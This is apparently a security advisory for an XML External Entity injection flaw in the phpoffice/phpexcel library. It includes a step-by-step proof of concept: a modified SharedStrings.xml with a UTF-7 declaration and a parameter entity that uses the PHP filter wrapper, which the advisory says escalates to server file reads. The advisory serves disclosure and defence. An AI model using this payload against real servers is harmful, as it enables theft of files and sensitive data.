XML External Entity (XXE) Injection Affecting phpoffice/phpexcel package, versions >=0.0.0

Affected versions of this package are vulnerable to XML External Entity (XXE) Injection through the toUtf8 function in the XmlScanner.php file. An attacker can disclose server files and sensitive information by providing an Excel sheet with a modified XML structure, specifying UTF-7 encoding with whitespace before the = in the declaration. Due to insufficient checks for that specification, the default UTF-8 is used and conversion logic is bypassed. This can expose file contents by using the PHP filter wrapper to access the server's filesystem.

An Excel sheet (XLSX) with at least one cell containing a value is needed.

Unzip the excel sheet, and modify the xl/SharedStrings.xml file with the following value (note the space after encoding=):

<?xml version="1.0" encoding= 'UTF-7' standalone="yes"?>
+ADw-!DOCTYPE abc [ ... ]>

1. The following string is encoded in base64:

<!ENTITY internal 'abc'  >" 

Resulting in:

PCFFTlRJVFkgaW50ZXJuYWwgJ2FiYycgID4K

2. The string is used with a parameter entity and the PHP filter wrapper to ultimately define custom entities and call them within the XML.

<?xml version="1.0" encoding= 'UTF-7' standalone="yes"?>
+ADw-!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "php://filter//resource=data://text/plain;base64,PCFFTlRJVFkgaW50ZXJuYWwgJ2FiYycgID4K" > %xxe;]>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1" uniqueCount="1"><si><t>&internal;</t></si></sst>

When this file is parsed by the library, the value abc should be in the original filled cell.

With the help of the PHP filter wrapper, this can be escalated to information disclosure/file read.

• GitHub Commit
• GitHub Commit
• GitHub Commit
• Nuclei Templates